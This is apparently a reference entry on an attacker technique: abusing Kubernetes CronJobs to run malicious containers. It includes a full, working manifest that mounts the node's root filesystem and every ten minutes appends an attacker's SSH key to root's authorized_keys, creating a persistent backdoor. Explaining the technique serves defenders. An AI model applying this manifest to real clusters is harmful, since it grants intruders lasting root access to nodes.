Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
One of the simplest and on the same time most efficient ways to deploy backdoor containers is the usage of a CronJob. The following adds the attacker’s SSH key to the authorized_keys
file every 10 minutes on the node the job is executed. To execute a task on every node on the cluster, also see “Backdoor Container”.
apiVersion: batch/v1
kind: CronJob
metadata:
name: ssh-key-inject
spec:
schedule: "*/10 * * * *"
jobTemplate:
spec:
template:
spec:
containers:
- name: evil
image: ubuntu
command: [ "/bin/sh", "-c", "mkdir -p /host/root/.ssh && echo 'ssh-rsa AAAAB3NzaC1y...CUkwfwh+iSTP' >> /host/root/.ssh/authorized_keys" ]
volumeMounts:
- name: host
mountPath: /host
volumes:
- name: host
hostPath:
path: /
restartPolicy: Never
Please note that this is a quick and dirty example only made for demonstration purposes and the authorized_keys
file will be filled up over time.